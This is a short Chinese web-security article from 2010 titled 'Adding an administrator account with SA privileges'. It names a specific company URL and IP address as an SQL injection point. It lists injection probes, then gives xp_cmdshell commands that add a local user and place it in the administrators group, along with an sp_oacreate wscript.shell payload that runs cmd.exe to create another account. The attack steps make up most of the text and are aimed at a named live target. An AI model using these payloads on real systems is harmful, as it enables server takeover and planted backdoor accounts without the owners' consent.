首页 > 安全 > 网站安全 >

SA权限添加管理员帐号

2010-10-20

注入点:http://www.enzymotec.com/Page.asp cc=0102041102 IP:192.117.122.145 以色列 inurl:asp具体脚本命令:1.判断是否有注入;and 1=1 ;and 1=2;and user_name()=dbo 判断当前系统的连接用户是不是sa2.添加系统的管理员;exec maste

注入点:asp">http://www.enzymotec.com/Page.asp cc=0102041102 IP:192.117.122.145 以色列 inurl:asp
具体脚本命令:
1.判断是否有注入;and 1=1 ;and 1=2
;and user_name()=dbo 判断当前系统的连接用户是不是sa
2.添加系统的管理员
;exec master.dbo.xp_cmdshell net user jiaozhu jiaozhu /add;--
;exec master.dbo.xp_cmdshell net localgroup administrators jiaozhu /add;--


declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:windowssystem32cmd.exe /c
这段命令是通过SQL执行系统命令的
例如:
declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:windowssystem32cmd.exe /c net user jiss 111 /add
这段命令是通过SQL执行系统命令的

相关文章
最新文章
热点推荐